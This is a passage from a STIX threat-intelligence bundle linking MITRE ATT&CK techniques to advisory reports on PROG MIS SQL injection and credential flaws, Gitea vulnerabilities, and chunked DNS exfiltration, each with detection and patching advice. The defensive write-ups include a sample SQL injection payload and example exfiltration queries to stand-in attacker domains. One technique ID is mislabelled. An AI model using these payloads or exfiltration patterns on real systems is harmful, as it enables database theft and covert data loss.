Kubernetes Central components.\n*   **Monitor RHACS Central Resources:** Monitor the CPU, memory, and network utilization of your RHACS Central components for unusual spikes or sustained high usage, which could indicate attempted exploitation of the vulnerability.\n*   **Review API Access:** Regularly audit and rotate API tokens used for RHACS Central to minimize the window of opportunity for an attacker using a compromised token.\n",
      "published": "2026-07-06T09:27:36Z",
      "labels": [
        "kubernetes",
        "red-hat",
        "dos",
        "vulnerability",
        "graphql"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9165"
        },
        {
          "source_name": "reference",
          "url": "https://access.redhat.com/security/cve/CVE-2026-9165"
        },
        {
          "source_name": "reference",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480505"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a22967ea-82c3-5cd1-9b63-b5fd485125b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0c41db74-3ce4-59ee-9004-628483feb937",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25c9ad5f-ef4f-57f0-bfa9-de69c3778c7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0c41db74-3ce4-59ee-9004-628483feb937",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0c41db74-3ce4-59ee-9004-628483feb937",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14809: Unauthenticated SQL Injection in Prog Management System",
      "description": "## Overview\n\nCVE-2026-14809 details a critical SQL Injection vulnerability present in the Prog Management System, a product developed by PROG MIS. This flaw allows unauthenticated remote attackers to execute arbitrary SQL commands directly against the underlying database. The vulnerability specifically enables attackers to read sensitive database contents, potentially leading to the exfiltration of confidential information such as user credentials, system configurations, or proprietary data. The issue stems from improper neutralization of special elements used in SQL commands. This vulnerability, scored with a CVSS 3.1 Base Score of 7.5 (High), poses a significant risk to organizations utilizing the affected system, as it grants attackers broad access to data without requiring any prior authentication. The exploitation does not appear to be currently observed in the wild.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies a publicly accessible instance of the Prog Management System.\n2.  The attacker crafts a malicious HTTP request targeting a vulnerable web endpoint within the system.\n3.  This request includes specially formed input containing SQL metacharacters (e.g., single quotes, comments, boolean conditions like `' OR 1=1--`) in a parameter expected to be used in a database query.\n4.  The vulnerable application processes the attacker's input without adequate sanitization or parameterized queries.\n5.  The malicious input is concatenated directly into a SQL statement that is then executed by the backend database.\n6.  The injected SQL commands manipulate the original query to return database schema information, table names, and column data.\n7.  The application returns the results of the modified query, exposing sensitive database contents to the attacker via the HTTP response.\n8.  The attacker continues to refine their injected SQL commands to systematically extract additional sensitive data from the entire database.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14809 allows unauthenticated remote attackers to read the full contents of the database backing the Prog Management System. This can lead to the exposure of highly sensitive information, including but not limited to, customer data, administrative credentials, intellectual property, and internal operational data. For organizations, this means a significant data breach risk, potential regulatory penalties, reputational damage, and follow-on attacks facilitated by the exfiltrated information. The CVSS 3.1 score of 7.5 (High) reflects the severe confidentiality impact.\n\n## Recommendation\n\n*   Immediately patch the Prog Management System with the latest updates provided by PROG MIS to address CVE-2026-14809.\n*   Deploy the Sigma rule below to your SIEM/detection platform to identify potential exploitation attempts against web servers running the Prog Management System.\n*   Implement or update Web Application Firewall (WAF) rules to detect and block common SQL Injection attack patterns, complementing endpoint detection efforts.\n*   Monitor web server logs for HTTP requests matching patterns indicative of SQL Injection attempts as highlighted by the detection rule.\n",
      "published": "2026-07-06T09:26:41Z",
      "labels": [
        "sql-injection",
        "vulnerability",
        "web",
        "cve",
        "high-severity"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14809"
        },
        {
          "source_name": "reference",
          "url": "https://www.twcert.org.tw/en/cp-139-11026-3df18-2.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--439cb1a7-fa15-5ab9-a6f7-a2ed86839382",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ac93344-8d21-5a36-a618-9ba6bd287b03",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Protocol Tunneling",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1572",
          "url": "https://attack.mitre.org/techniques/T1572"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea904d7a-0b37-5b9a-aad5-15cfe823ba1c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ac93344-8d21-5a36-a618-9ba6bd287b03",
      "target_ref": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8ac93344-8d21-5a36-a618-9ba6bd287b03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential DNS Exfiltration via Excessive Chunked Queries",
      "description": "## Overview\n\nThis brief describes a technique used by threat actors for data exfiltration and command and control, leveraging DNS queries on Windows hosts. Attackers, after compromising a system, encode stolen data into small chunks, embedding each chunk within a subdomain of a DNS query (e.g., `42-base64payload.attacker.example`). This method, known as DNS tunneling or chunked DNS exfiltration, is designed to bypass traditional network security controls that monitor volume or content, as the data is transmitted incrementally over a legitimate protocol. The technique can be employed by various threat groups or malware to discreetly transfer sensitive information out of an organization's network or to establish covert communication channels. The detection rule described aims to identify sessions with a high volume of distinct chunk indices and sufficiently long encoded payloads from a single process to a specific base domain within a short timeframe, indicating potential malicious activity rather than normal DNS resolution.\n\n## Attack Chain\n\n1.  **Initial Compromise:** An attacker gains unauthorized access to a Windows host within the target network through various initial access techniques (e.g., phishing, exploiting a vulnerable service).\n2.  **Data Identification:** The attacker identifies sensitive data on the compromised host slated for exfiltration.\n3.  **Data Encoding and Chunking:** The identified data is encoded (e.g., Base64 or hexadecimal) and then split into numerous smaller chunks to prepare for discreet transmission.\n4.  **DNS Query Generation:** A malicious process (e.g., an LOLBin, custom script, or malware) on the compromised host constructs DNS queries where each data chunk is embedded as a unique subdomain, often prefixed with a sequential index (e.g., `1-chunkA.malicious.com`, `2-chunkB.malicious.com`).\n5.  **DNS Resolution Attempt:** The compromised host attempts to resolve these specially crafted DNS queries, sending them to the configured DNS resolver.\n6.  **Outbound Connection \u0026 Data Transfer:** The DNS queries containing the encoded data are forwarded to the attacker-controlled authoritative DNS server for the specified base domain (`malicious.com`).\n7.  **Data Reconstruction:** The attacker's DNS server logs the incoming queries, extracts the indexed data chunks, and reconstructs the original stolen data.\n8.  **Exfiltration Complete:** The sensitive data is successfully exfiltrated from the target environment, often without triggering traditional egress filtering designed for common protocols or file transfers.\n\n## Impact\n\nSuccessful DNS exfiltration can lead to severe data breaches, resulting in the loss of sensitive intellectual property, customer data, financial records, or other confidential information. This can cause significant financial penalties, reputational damage, and regulatory non-compliance for affected organizations. The stealthy nature of this technique means that exfiltration can occur undetected for extended periods, allowing attackers to harvest vast quantities of data. If the technique is used for command and control, it can provide attackers with persistent, covert access to compromised systems, enabling further malicious activities like deploying additional malware, lateral movement, or ransomware deployment, potentially leading to widespread system disruption and operational paralysis.\n\n## Recommendation\n\n*   Enable Sysmon Event ID 22 (DNS Query) logging on all Windows hosts to provide the necessary telemetry for detecting chunked DNS exfiltration.\n*   Deploy the `Potential DNS Exfiltration via Chunked DNS Queries` Sigma rule to your SIEM/EDR and tune it for your specific environment, prioritizing alerts from uncommon processes.\n*   Implement and configure Elastic Defend or CrowdStrike endpoint protection solutions to gather comprehensive network and process telemetry as described in the brief.\n*   If an alert fires, investigate the `Esql.base_domain` and block it at your DNS resolvers and egress firewalls to prevent further exfiltration and C2 communications.\n*   Review network logs for processes making unusual DNS queries, especially those resolving to newly observed or unsanctioned domains.\n",
      "published": "2026-07-06T09:02:18Z",
      "labels": [
        "exfiltration",
        "dns-tunneling",
        "data-exfiltration",
        "windows",
        "endpoint",
        "command-and-control"
      ],
      "object_refs": [
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
        "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1048/003/"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1572/"
        },
        {
          "source_name": "reference",
          "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/exfiltration_excessive_dns_queries_by_process.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--25a83530-d099-50b4-8c93-f43c679c09f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.twcert.org.tw/en/cp-139-11026-3df18-2.html",
      "pattern": "[url:value = 'https://www.twcert.org.tw/en/cp-139-11026-3df18-2.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:35:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2ef6c50a-ab33-538a-ad42-ab11efa42170",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48f76f39-7020-54f0-b3e0-85c4b07212cb",
      "target_ref": "indicator--25a83530-d099-50b4-8c93-f43c679c09f0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cfe4d1d9-2b01-5ced-b406-de52f04e8bd2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.twcert.org.tw/tw/cp-132-11025-fa1d9-1.html",
      "pattern": "[url:value = 'https://www.twcert.org.tw/tw/cp-132-11025-fa1d9-1.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T08:35:40Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20eceadf-45f1-52d4-ac51-102ca38f672c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48f76f39-7020-54f0-b3e0-85c4b07212cb",
      "target_ref": "indicator--cfe4d1d9-2b01-5ced-b406-de52f04e8bd2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e6a6dbcf-dbc4-57c1-bd28-fffc622c4b88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48f76f39-7020-54f0-b3e0-85c4b07212cb",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddb427e2-66ea-5e59-a3c2-f3066d7b3304",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48f76f39-7020-54f0-b3e0-85c4b07212cb",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--48f76f39-7020-54f0-b3e0-85c4b07212cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14808 — Prog Management System Sensitive Information Exposure",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-14808, has been identified in the Prog Management System developed by PROG MIS. This flaw, categorized as an Exposure of Sensitive Information (CWE-497), permits unauthenticated remote attackers to access a specific, unprotected web page within the system. By merely viewing this page, attackers can directly obtain the database account and password used by the application. This vulnerability presents a severe risk, as it grants attackers access to critical backend credentials, potentially leading to unauthorized access to the entire database and subsequent data compromise or system manipulation. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (Critical) by TWCERT/CC, underscoring its severe implications for affected organizations.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies a publicly accessible instance of the vulnerable Prog Management System.\n2.  The attacker sends a crafted HTTP GET request to a specific, unprotected web page within the application, which is known to expose sensitive system information.\n3.  The vulnerable Prog Management System processes the request without enforcing proper authentication or authorization checks for this particular page.\n4.  The system responds to the attacker's request, and the HTTP response body contains the plaintext database account username and password.\n5.  The attacker parses the HTTP response to extract the sensitive database credentials.\n6.  With the obtained database account and password, the attacker gains unauthorized administrative access to the underlying database.\n7.  The attacker can then perform various malicious actions, including data exfiltration, modification, or deletion, depending on the privileges of the compromised database account.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14808 results in the direct compromise of the application's database credentials. This allows unauthenticated attackers to gain full access to the backend database, potentially leading to widespread data breaches, data manipulation, or denial of service. The impact includes the compromise of sensitive organizational data, customer information, and critical operational data. While specific victim counts are not available, any organization utilizing the affected Prog Management System versions by PROG MIS is at risk. Such a compromise can lead to significant financial losses, reputational damage, and regulatory penalties.\n\n## Recommendation\n\n*   Immediately apply the security update released by PROG MIS for CVE-2026-14808 to all instances of the Prog Management System.\n*   Review web server access logs for requests to unusual or sensitive paths that respond with database credentials, and tune existing webserver monitoring rules.\n*   Implement strong database credential management practices, including least privilege, regular rotation, and secure storage, separate from application code, even after patching CVE-2026-14808.\n*   Monitor all database access logs for unusual activity or access patterns originating from the application's account following the remediation of CVE-2026-14808.\n",
      "published": "2026-07-06T08:35:40Z",
      "labels": [
        "sensitive-data-exposure",
        "web-vulnerability",
        "critical-vulnerability",
        "cwe-497",
        "database-credentials"
      ],
      "object_refs": [
        "indicator--25a83530-d099-50b4-8c93-f43c679c09f0",
        "indicator--cfe4d1d9-2b01-5ced-b406-de52f04e8bd2",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14808"
        },
        {
          "source_name": "reference",
          "url": "https://www.twcert.org.tw/en/cp-139-11026-3df18-2.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.twcert.org.tw/tw/cp-132-11025-fa1d9-1.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--272f8bc7-0449-5ad5-a0f2-39ca7213b8da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1dab768f-149b-5ec0-86aa-98eb8ff59b0f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--97207a33-7e91-5d2c-a367-3f9062508367",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1dab768f-149b-5ec0-86aa-98eb8ff59b0f",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e3d0284-dcc3-5194-bb1d-ab5d2a3e3d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1dab768f-149b-5ec0-86aa-98eb8ff59b0f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1dab768f-149b-5ec0-86aa-98eb8ff59b0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14807: PROG MIS ERP App Hard-coded Credentials Vulnerability",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-14807, has been identified in the ERP App developed by PROG MIS. This flaw is categorized as a Use of Hard-coded Credentials (CWE-798), enabling unauthenticated remote attackers to bypass the application's authentication mechanisms. Exploitation of this vulnerability grants attackers unauthorized login access, allowing them to view the application's source code. From the exposed code, attackers can extract sensitive information, specifically the database account and password. This provides a direct path to the underlying database, leading to potential compromise of all data managed by the ERP system. The vulnerability carries a CVSS v3.1 base score of 9.8, underscoring its severe impact on confidentiality, integrity, and availability. All versions of the PROG MIS ERP App are affected.\n\n## Attack Chain\n\n1.  An unauthenticated remote attacker identifies the PROG MIS ERP App as vulnerable to CVE-2026-14807.\n2.  The attacker leverages the inherent hard-coded credentials (CWE-798) to gain unauthorized authenticated access to the ERP App without needing valid user credentials.\n3.  Upon successful login, the attacker navigates through the application interface to access functionalities that allow viewing or downloading of application code files.\n4.  The attacker extracts sensitive hard-coded database connection strings, including the database account username and password, directly from the exposed application code.\n5.  Using the newly acquired database credentials, the attacker establishes a direct, unauthorized connection to the ERP system's backend database.\n6.  With direct database access, the attacker can then perform various malicious activities, such as exfiltrating sensitive company data, modifying critical business records, or deploying further persistence mechanisms.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14807 has a severe impact on affected organizations utilizing the PROG MIS ERP App. Attackers gain complete access to the application's internal code, directly compromising intellectual property and potentially revealing further vulnerabilities. More critically, the database account and password can be obtained, leading to full compromise of the ERP system's underlying database. This allows for unauthorized viewing, modification, or deletion of sensitive financial, customer, and operational data, causing significant data breaches, operational disruption, and reputational damage. Given that ERP systems manage core business processes, the compromise could halt operations and incur substantial recovery costs.\n\n## Recommendation\n\n*   Prioritize patching or applying vendor-provided security updates for the PROG MIS ERP App to mitigate CVE-2026-14807 immediately.\n*   Review all application code for the PROG MIS ERP App to identify and remediate any instances of hard-coded credentials (CWE-798), replacing them with secure credential management practices (e.g., environment variables, secret management services).\n*   Implement network segmentation to restrict direct database access from the ERP application servers to only necessary ports and services, limiting the blast radius if the application layer is compromised.\n*   Conduct a thorough post-incident forensic analysis if exploitation is suspected to identify potential lateral movement or data exfiltration.\n",
      "published": "2026-07-06T08:34:41Z",
      "labels": [
        "hard-coded-credentials",
        "erp",
        "web-application",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14807"
        },
        {
          "source_name": "reference",
          "url": "https://www.twcert.org.tw/en/cp-139-11024-c5c1a-2.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.twcert.org.tw/tw/cp-132-11023-3abe8-1.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db8d2409-31c7-5bbd-a4e2-1d7c3b9337ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44715b6b-8c2f-5235-a330-7b9975bdb142",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1838c62-e0a5-5a89-a41c-fca2426ccc1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44715b6b-8c2f-5235-a330-7b9975bdb142",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1e6c0b0a-32ea-5510-a376-9a07cb8b82ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44715b6b-8c2f-5235-a330-7b9975bdb142",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1498",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56feb34d-1f21-5a31-a229-b63f747ee887",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44715b6b-8c2f-5235-a330-7b9975bdb142",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--44715b6b-8c2f-5235-a330-7b9975bdb142",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gitea: Multiple Vulnerabilities Leading to XSS, Info Disclosure, and File Manipulation",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued a high-severity alert regarding multiple unpatched vulnerabilities in Gitea, a popular self-hosted Git service. These vulnerabilities allow an attacker to bypass security measures, disclose sensitive information, execute Cross-Site Scripting (XSS) attacks, and manipulate files. While specific Common Vulnerabilities and Exposures (CVE) identifiers have not been released, the broad range of potential impacts indicates significant risk to Gitea instances if exploited. Organizations using Gitea versions without the latest security fixes are advised to prioritize updates. The advisory, published on 2026-07-06, highlights the importance of timely patching to prevent unauthorized access and data compromise, emphasizing that the absence of detailed CVEs does not diminish the severity of the threat.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a vulnerable Gitea instance and sends specially crafted HTTP requests to the application.\n2.  **Vulnerability Exploitation**: Gitea processes the malicious input, leading to the exploitation of one or more undisclosed vulnerabilities, such as input validation flaws or authorization bypasses.\n3.  **XSS Execution**: If Cross-Site Scripting (XSS) vulnerabilities are triggered, malicious client-side scripts are injected and executed within a victim's browser session when they interact with the compromised Gitea application.\n4.  **Security Bypass / Information Disclosure**: Successful exploitation may bypass authentication or authorization mechanisms, granting unauthorized access, or lead to the exposure of sensitive data from the Gitea application or its underlying system.\n5.  **File Manipulation**: Attackers leverage vulnerabilities to manipulate arbitrary files on the server hosting Gitea, potentially altering configurations, modifying web content, or placing malicious files like web shells.\n6.  **Achieved Impact**: The attacker achieves objectives such as data exfiltration, establishing persistent access through manipulated files, or causing denial of service by corrupting critical system components or databases.\n\n## Impact\n\nSuccessful exploitation of these Gitea vulnerabilities could lead to significant consequences for affected organizations. Attackers could gain unauthorized access to sensitive code repositories, intellectual property, or user credentials through information disclosure and security bypass flaws. Cross-Site Scripting attacks might enable session hijacking, credential theft, or further client-side exploitation against legitimate users. Furthermore, file manipulation capabilities could allow attackers to establish persistence by planting web shells, altering configurations, or deploying malicious payloads, potentially leading to full system compromise or supply chain attacks if malicious code is injected into software projects.\n\n## Recommendation\n\n*   Update Gitea to the latest stable version to address the multiple vulnerabilities identified, including those leading to security bypass, information disclosure, XSS, and file manipulation.\n*   Monitor web server logs (e.g., `webserver` category) for Gitea for unusual HTTP requests, particularly those exhibiting characteristics of attempted exploitation for information disclosure or file manipulation.\n*   Enforce robust Content Security Policies (CSPs) within Gitea deployments to mitigate the execution of malicious client-side scripts, a common outcome of Cross-Site Scripting (XSS) vulnerabilities.\n",
      "published": "2026-07-06T08:29:46Z",
      "labels": [
        "web-exploitation",
        "vulnerability",
        "gitea"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2925"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1bb07ab6-7a35-5b9d-bdc6-aef17f915159",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
